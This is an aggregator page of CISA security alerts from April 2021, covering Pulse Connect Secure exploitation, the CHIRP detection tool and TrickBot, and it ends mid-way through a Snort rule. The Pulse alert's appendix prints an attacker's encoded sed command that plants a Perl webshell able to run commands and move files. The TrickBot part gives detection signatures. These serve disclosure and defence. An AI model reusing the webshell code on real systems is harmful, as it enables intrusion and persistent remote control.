Sicurezza – News ENG

News, Alert e Bollettini da Computer Emergency Response Team in lingua inglese

CERT (US-CERT)
  • CISA Incident Response to SUPERNOVA Malware
    by CISA on 22 Aprile 2021 at 2:00 pm

    Original release date: April 22, 2021CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement. CISA encourages organizations to review AR21-112A for more information. This product is provided subject to this Notification and this Privacy & Use policy.

  • Drupal Releases Security Updates
    by CISA on 22 Aprile 2021 at 12:53 pm

    Original release date: April 22, 2021Drupal has released security updates to address a vulnerability affecting Drupal 7, 8.9, 9.0, and 9.1. An attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and administrators to review Drupal Advisory SA-CORE-2021-002 and apply the necessary updates or mitigations. This product is provided subject to this Notification and this Privacy & Use policy.

  • SonicWall Releases Patches for Email Security Products
    by CISA on 21 Aprile 2021 at 3:46 pm

    Original release date: April 21, 2021CISA is aware of three vulnerabilities affecting SonicWall Email Security products: CVE-2021-20021, CVE-2021-20022, and CVE-2021-20023. A remote attacker could exploit these vulnerabilities to take control of an affected system. According to SonicWall, "In at least one known case, these vulnerabilities have been observed to be exploited ‘in the wild.’" CISA encourages users and administrators to review the SonicWall security advisory and apply the necessary update as soon as possible. Note: SonicWall released patches for CVE-2021-20021 and CVE-2021-20022 on April 9, 2021, and for CVE-2021-20023 on April 20, 2021. This product is provided subject to this Notification and this Privacy & Use policy.

  • Google Releases Security Updates for Chrome
    by CISA on 21 Aprile 2021 at 3:35 pm

    Original release date: April 21, 2021Google has released Chrome version 90.0.4430.85 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy.

  • CISA Issues Emergency Directive on Pulse Connect Secure
    by CISA on 20 Aprile 2021 at 10:57 pm

    Original release date: April 20, 2021CISA has issued Emergency Directive (ED) 21-03, as well as Alert AA21-110A, to address the exploitation of vulnerabilities affecting Pulse Connect Secure (PCS) software. An attacker could exploit these vulnerabilities to gain persistent system access and take control of the enterprise network operating the vulnerable PCS device. These vulnerabilities are being exploited in the wild.  Specifically, ED 21-03 directs federal departments and agencies to run the Pulse Connect Secure Integrity Tool on all instances of PCS virtual and hardware appliances to determine whether any PCS files have been maliciously modified or added.   Although ED 21-03 applies to Federal Civilian Executive Branch departments and agencies, CISA strongly recommends state and local governments, the private sector, and others to run the Pulse Connect Secure Integrity Tool and review ED 21-03: Mitigate Pulse Connect Secure Product Vulnerabilities for additional mitigation recommendations.    This product is provided subject to this Notification and this Privacy & Use policy.

  • CISA Releases Alert on Exploitation of Pulse Connect Secure Vulnerabilities
    by CISA on 20 Aprile 2021 at 5:57 pm

    Original release date: April 20, 2021 | Last revised: April 21, 2021CISA is aware of ongoing exploitation of Ivanti Pulse Connect Secure vulnerabilities compromising U.S. government agencies, critical infrastructure entities, and private sector organizations. In response, CISA has released Alert AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities, as well as Emergency Directive (ED) 21-03, to offer technical details regarding this activity. Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to follow the guidance in Alert AA21-110A, which includes: Running the Pulse Connect Secure Integrity Tool Updating their Pulse Connect Secure appliance to the latest software version Implementing the mitigation provided by Ivanti Pulse Secure (if evidence of comprise is found) For additional information regarding this ongoing exploitation, see the FireEye blog post: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day and the CERT Coordination Center (CERT/CC) Vulnerability Note VU#213092. This product is provided subject to this Notification and this Privacy & Use policy.

  • Oracle Releases April 2021 Critical Patch Update
    by CISA on 20 Aprile 2021 at 5:22 pm

    Original release date: April 20, 2021Oracle has released its Critical Patch Update for April 2021 to address 384 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the Oracle April 2021 Critical Patch Update and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities
    by CISA on 20 Aprile 2021 at 3:03 pm

    Original release date: April 20, 2021 | Last revised: April 22, 2021SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Pulse Secure Connect Integrity Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching. Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Pulse Secure Connect Integrity Tool, update to the latest software version, and investigate for malicious activity. Technical DetailsOn March 31, 2021, Ivanti released the Pulse Secure Connect Integrity Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states: We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ). The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality: DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907 Runs arbitrary commands passed to it Copies malicious code into Licenseserverproto.cgi Licenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6 Copies malicious logic to the new files during the patching process, allowing for persistence Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a Runs arbitrary commands passed via HTTP requests compcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3 Publicly-facing page to send arbitrary commands with ID argument Login.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5 Allows for credential harvesting of authenticated users Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a Runs arbitrary commands passed via HTTP requests Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active: Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX. The threat actor then ran the commands listed in table 1 via the webshell. Table 1: Commands run via webshell Time Command 2021-01-19T07:46:05.000+0000 pwd 2021-01-19T07:46:24.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T08:10:13.000+0000 cat%20/home/webserver/htdocs/dana-na/l[redacted] 2021-01-19T08:14:18.000+0000 See Appendix. 2021-01-19T08:15:11.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T08:15:49.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T09:03:05.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T09:04:47.000+0000 $mount 2021-01-19T09:05:13.000+0000 /bin/mount%20-o%20remount,rw%20/dev/root%20/ 2021-01-19T09:07:10.000+0000 $mount   The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity. Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available. MitigationsCISA strongly urges organizations using Pulse Secure devices to immediately: Review the Pulse Secure Connect Integrity Tool Quick Start Guide and Customer FAQs Run the Pulse Secure Connect Integrity Tool. The tool requires a reboot. If virtualized, take a snapshot before running. If the appliance is physical, consider the consequences of rebooting and running the tool and contact Ivanti for assistance or questions. Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed. Implement the mitigations released by the vendor. According Ivanti Pulse Secure, the interim XML configurations listed in the "Workaround" section of SA44784 - 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893) provide significant protection against threat actor activity. Update to the latest software version, per the process outlined on Ivanti Pulse Secure’s website which contains security enhancements. If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to: Contact CISA to report your findings (see Contact Information section below). Contact Ivanti Pulse Secure for assistance in capturing forensic information. Review “Unauthenticated Web Requests” log for evidence of exploitation, if enabled. Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts and any accounts that could be modified by any account described above, all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched. Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance's VPN lease pool. Look for unauthorized applications and scheduled tasks in their environment. Ensure no new administrators were created or non-privileged users were added to privileged groups. Remove any remote access programs not approved by the organization. Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment. In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements, which includes: After preservation, you can remediate your Pulse Connect Secure appliance by:  Disabling the external-facing interface.   Saving the system and user config. Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console) Updating the appliance to the newest version. Re-importing the saved config.    Re-enabling the external interface.  CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Pulse Secure Connect Integrity Tool again after remediation has been taken place. Contact InformationCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at 1-888-282-0870 (From outside the United States: +1-703-235-8832) central@cisa.dhs.gov (UNCLASS) us-cert@dhs.sgov.gov (SIPRNET) us-cert@dhs.ic.gov (JWICS) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/. Appendix: Large sed Command Found In Unauthenticated Logs Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20\$n=\$_[0];my%20\$rs;for%20(my%20\$i=0;\$i%3C\$n;\$i++){my%20\$n1=int(rand(256));\$rs.=chr(\$n1);}return%20\$rs;}sub%20a{my%20\$st=\$_[0];my%20\$k=r([redacted]);my%20\$en%20=%20RC4(%20\$k.\$ph,%20\$st);return%20encode_base64(\$k.\$en);}sub%20b{my%20\$s=%20decode_base64(\$_[0]);%20my%20\$l=length(\$s);my%20\$k=%20substr(\$s,0,[redacted]);my%20\$en=substr(\$s,[redacted],\$l-[redacted]);my%20\$de%20=%20RC4(%20\$k.\$ph,%20\$en%20);return%20\$de;}sub%20c{my%20\$fi=CGI::param(%27img%27);my%20\$FN=b(\$fi);my%20\$fd;print%20\%22Content-type:%20application/x-download\\n\%22;open(*FILE,%20\%22%3C\$FN\%22%20);while(%3CFILE%3E){\$fd=\$fd.\$_;}close(*FILE);print%20\%22Content-Disposition:%20attachment;%20filename=tmp\\n\\n\%22;print%20a(\$fd);}sub%20d{print%20\%22Cache-Control:%20no-cache\\n\%22;print%20\%22Content-type:%20text/html\\n\\n\%22;my%20\$fi%20=%20CGI::param(%27cert%27);\$fi=b(\$fi);my%20\$pa=CGI::param(%27md5%27);\$pa=b(\$pa);open%20(*outfile,%20\%22%3E\$pa\%22);print%20outfile%20\$fi;close%20(*outfile);}sub%20e{print%20\%22Cache-Control:%20no-cache\\n\%22;print%20\%22Content-type:%20image/gif\\n\\n\%22;my%20\$na=CGI::param(%27name%27);\$na=b(\$na);my%20\$rt;if%20(!\$na%20or%20\$na%20eq%20\%22cd\%22)%20{\$rt=\%22Error%20404\%22;}else%20{my%20\$ot=\%22/tmp/1\%22;system(\%22\$na%20%3E/tmp/1%202%3E&1\%22);open(*cmd_result,\%22%3C\$ot\%22);while(%3Ccmd_result%3E){\$rt=\$rt.\$_;}close(*cmd_result);unlink%20\$ot}%20%20print%20a(\$rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20\%22\%22){e();}else{%20%20%20&main();}}if%20(\$ENV{%27REQUEST_METHOD%27}%20eq%20\%22POST\%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX References FireEye blog: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day CERT/CC Vulnerability Note VU#213092 Pulse Connect Secure vulnerable to authentication bypass Revisions April 20, 2021: Initial version April 21, 2021: Added CERT/CC Vulnerability Note to References This product is provided subject to this Notification and this Privacy & Use policy.

  • VMware Releases Security Update
    by CISA on 20 Aprile 2021 at 2:00 pm

    Original release date: April 20, 2021VMware has released a security update to address a vulnerability affecting NSX-T. An attacker can exploit this vulnerability to take control of an affected system CISA encourages users and administrators to review VMSA-2021-0006 and apply the necessary update and workaround. This product is provided subject to this Notification and this Privacy & Use policy.

  • Mozilla Releases Security Update for Firefox, Firefox ESR, and Thunderbird
    by CISA on 20 Aprile 2021 at 1:59 pm

    Original release date: April 20, 2021Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker can exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the Mozilla Security Advisories for Firefox 88, Firefox ESR 78.10, and Thunderbird 78.10, and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy.

  • WordPress Releases Security and Maintenance Update
    by CISA on 16 Aprile 2021 at 4:46 pm

    Original release date: April 16, 2021WordPress versions 4.7-5.7 are affected by multiple vulnerabilities. An attacker could exploit one of these vulnerabilities to take control of an affected website.  CISA encourages users and administrators to review the WordPress Security and Maintenance Release and upgrade to WordPress 5.7.1. This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool
    by CISA on 18 Marzo 2021 at 6:00 pm

    Original release date: March 18, 2021 | Last revised: April 15, 2021SummaryUpdated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise. This Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts: AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, which primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations. AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments, which addresses APT activity within Microsoft 365/Azure environments and offers an overview of—and guidance on—available open-source tools. The Alert includes the CISA-developed Sparrow tool that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment. Similar to Sparrow—which scans for signs of APT compromise within an M365 or Azure environment—CHIRP scans for signs of APT compromise within an on-premises environment. In this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment. CHIRP is freely available on the CISA GitHub Repository. For additional guidance watch CISA's CHIRP Overview video. Note: CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository. CISA advises organizations to use CHIRP to: Examine Windows event logs for artifacts associated with this activity; Examine Windows Registry for evidence of intrusion; Query Windows network artifacts; and Apply YARA rules to detect malware, backdoors, or implants. Network defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network. Click here for a PDF version of this report. Technical DetailsHow CHIRP Works CHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts AA20-352A and AA21-008A. Currently, the tool looks for: The presence of malware identified by security researchers as TEARDROP and RAINDROP; Credential dumping certificate pulls; Certain persistence mechanisms identified as associated with this campaign; System, network, and M365 enumeration; and Known observable indicators of lateral movement. Network defenders can follow step-by-step instructions on the CISA CHIRP GitHub repository to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity. Compatibility CHIRP currently only scans Windows operating systems. Instructions CHIRP is available on CISA’s GitHub repository in two forms: A compiled executable A python script CISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository. If you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository. MitigationsInterpreting the Results CHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network. Frequently Asked Questions What systems should CHIRP run on? Systems running SolarWinds Orion or believed to be involved in any resulting lateral movement. What should I do with results? Ingest the JSON results into a SIEM system, web browser, or text editor. Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP? Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning for on-premises systems for similar activity. How often should I run CHIRP? CHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format. Do I need to configure the tool before I run it? No. Will CHIRP change or affect anything on the system(s) it runs on? No, CHIRP only scans the system(s) it runs on and makes no active changes. How long will it take to run CHIRP? CHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs. If I have questions, who do I contact?   For general questions regarding CHIRP, please contact CISA via email at central@cisa.dhs.gov or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at https://us-cert.cisa.gov/report. For all technical issues or support for CHIRP, please submit issues at the CISA CHIRP GitHub Repository.  Revisions March 18, 2021: Initial Publication April 9, 2021: Fixed PDF (not related to content) April 15, 2021: Updated with Attribution Statement This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-076A: TrickBot Malware
    by CISA on 17 Marzo 2021 at 3:00 pm

    Original release date: March 17, 2021 | Last revised: March 24, 2021SummaryThis Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot. TrickBot—first identified in 2016—is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. To secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees. Click here for a PDF version of this report. Technical DetailsTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which—if enabled—execute malware (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s command and control (C2) server to download TrickBot to the victim’s system. Attackers can use TrickBot to: Drop other malware, such as Ryuk and Conti ransomware, or Serve as an Emotet downloader.[1] TrickBot uses person-in-the-browser attacks to steal information, such as login credentials (Man in the Browser [T1185]). Additionally, some of TrickBot’s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (Reconnaissance [TA0043]), to trying to manipulate, interrupt, or destroy systems and data (Impact [TA0040]). TrickBot is capable of data exfiltration, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Gather Victim Host Information: Firmware [T1592.003]).[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks. Figure 1 lays out TrickBot’s use of enterprise techniques. Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot   MITRE ATT&CK Techniques According to MITRE, TrickBot [S0266] uses the ATT&CK techniques listed in table 1. Table 1: TrickBot ATT&CK techniques for enterprise Reconnaissance [TA0043] Technique Title ID Use Gather Victim Host Information: Firmware T1592.003 TrickBot is capable of host enumeration such as reconnaissance of UEFI/BIOS firmware. Initial Access [TA0001] Technique Title ID Use Phishing: Spearphishing Attachment T1566.001 TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware. Phishing: Spearphishing Link T1566.002 TrickBot has been delivered via malicious links in phishing emails. Execution [TA0002] Technique Title ID Use Scheduled Task/Job: Scheduled Task T1053.005 TrickBot creates a scheduled task on the system that provides persistence. Command and Scripting Interpreter: Windows Command Shell T1059.003 TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine. Native API T1106 TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow. User Execution: Malicious Link T1204.001 TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link. User Execution: Malicious File T1204.002 TrickBot has attempted to get users to launch malicious documents to deliver its payload. Persistence [TA0003] Technique Title ID Use Scheduled Task/Job: Scheduled Task T1053.005 TrickBot creates a scheduled task on the system that provides persistence. Create or Modify System Process: Windows Service T1543.003 TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. Privilege Escalation [TA0004] Technique Title ID Use Scheduled Task/Job: Scheduled Task T1053.005 TrickBot creates a scheduled task on the system that provides persistence. Process Injection: Process Hollowing T1055.012 TrickBot injects into the svchost.exe process. Create or Modify System Process: Windows Service T1543.003 TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.  Defense Evasion [TA0005] Technique Title ID Use Obfuscated Files or Information T1027 TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files. Obfuscated Files or Information: Software Packing T1027.002 TrickBot leverages a custom packer to obfuscate its functionality. Masquerading T1036 The TrickBot downloader has used an icon to appear as a Microsoft Word document. Process Injection: Process Hollowing T1055.012 TrickBot injects into the svchost.exe process. Modify Registry T1112 TrickBot can modify registry entries. Deobfuscate/Decode Files or Information T1140 TrickBot decodes the configuration data and modules. Subvert Trust Controls: Code Signing T1553.002 TrickBot has come with a signed downloader component. Impair Defenses: Disable or Modify Tools T1562.001 TrickBot can disable Windows Defender. Credential Access [TA0006] Technique Title ID Use Input Capture: Credential API Hooking T1056.004 TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. Unsecured Credentials: Credentials in Files T1552.001 TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials. Unsecured Credentials: Credentials in Registry T1552.002 TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key. Credentials from Password Stores T1555 TrickBot can steal passwords from the KeePass open-source password manager. Credentials from Password Stores: Credentials from Web Browsers T1555.003 TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl. Discovery [TA0007] Technique Tactic ID Use System Service Discovery T1007 TrickBot collects a list of install programs and services on the system’s machine. System Network Configuration Discovery T1016 TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine. Remote System Discovery T1018 TrickBot can enumerate computers and network devices. System Owner/User Discovery T1033 TrickBot can identify the user and groups the user belongs to on a compromised host. Permission Groups Discovery T1069 TrickBot can identify the groups the user on a compromised host belongs to. System Information Discovery T1082 TrickBot gathers the OS version, machine name, CPU type, amount of RAM available from the victim’s machine. File and Directory Discovery T1083 TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information. Account Discovery: Local Account T1087.001 TrickBot collects the users of the system. Account Discovery: Email Account T1087.003 TrickBot collects email addresses from Outlook. Domain Trust Discovery T1482 TrickBot can gather information about domain trusts by utilizing Nltest. Collection [TA0009] Technique Tactic ID Use Data from Local System T1005 TrickBot collects local files and information from the victim’s local machine. Input Capture:Credential API Hooking T1056.004 TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. Person in the Browser T1185 TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage. Command and Control [TA0011] Technique Tactic ID Use Fallback Channels T1008 TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers. Application Layer Protocol: Web Protocols T1071.001 TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files. Ingress Tool Transfer T1105 TrickBot downloads several additional files and saves them to the victim's machine. Data Encoding: Standard Encoding T1132.001 TrickBot can Base64-encode C2 commands. Non-Standard Port T1571 Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. Encrypted Channel: Symmetric Cryptography T1573.001 TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic. Exfiltration [TA0010] Technique Tactic ID Use Exfiltration Over C2 Channel T1041 TrickBot can send information about the compromised host to a hardcoded C2 server. Detection Signatures CISA developed the following snort signature for use in detecting network activity associated with TrickBot activity.   alert tcp any [443,447] -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|0b|example.com"; fast_pattern:only; content:"Global Security"; content:"IT Department"; pcre:"/(?:\x09\x00\xc0\xb9\x3b\x93\x72\xa3\xf6\xd2|\x00\xe2\x08\xff\xfb\x7b\x53\x76\x3d)/"; classtype:bad-unknown; metadata:service ssl,service and-ports;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'"; sid:1; rev:1; flow:established,to_server; content:"/anchor"; http_uri; fast_pattern:only; content:"GET"; nocase; http_method; pcre:"/^\/anchor_?.{3}\/[\w_-]+\.[A-F0-9]+\/?$/U"; classtype:bad-unknown; priority:1; metadata:service http;)   alert tcp any $SSL_PORTS -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|31 0b 30 09 06 03 55 04 06 13 02|XX"; nocase; content:"|31 15 30 13 06 03 55 04 07 13 0c|Default City"; nocase; content:"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd"; nocase; content:!"|31 0c 30 0a 06 03 55 04 03|"; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'"; sid:1; rev:1; flow:established,to_server; content:"boundary=Arasfjasu7|0d 0a|"; http_header; content:"name=|22|proclist|22|"; http_header; content:!"Referer"; content:!"Accept"; content:"POST"; http_method; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'"; sid:1; rev:1; flow:established,to_server; content:"User-Agent|3a 20|WinHTTP loader/1."; http_header; fast_pattern:only; content:".png|20|HTTP/1."; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}(?:\x3a\d{2,5})?$/mH"; content:!"Accept"; http_header; content:!"Referer|3a 20|"; http_header; 